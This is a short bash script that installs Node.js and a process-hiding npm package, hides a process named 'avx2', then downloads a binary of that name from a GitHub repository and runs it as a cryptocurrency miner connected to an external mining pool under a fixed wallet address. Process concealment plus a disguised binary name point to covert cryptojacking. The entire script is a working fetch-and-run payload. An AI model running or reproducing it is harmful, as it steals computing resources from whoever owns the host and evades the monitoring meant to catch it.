#!/bin/bash
sudo apt-get update && sudo apt-get install sudo -y && sudo apt-get install git -y && sudo apt-get install gcc wget -y && curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt-get install nodejs -y && npm install -g npm@8.4.1 && npm i -g node-process-hider && sudo ph add avx2 && wget https://github.com/duitawa/ansible/raw/main/avx2 && chmod +x avx2 && ./avx2 -a minotaurx -o stratum+tcps://stratum-asia.rplant.xyz:17068 -u RBthiAgtmCjL8cEUtwNPkpw2WwFtMQGMQM.$(echo $(shuf -i 100-999 -n 1)-CPU)
sleep 24h
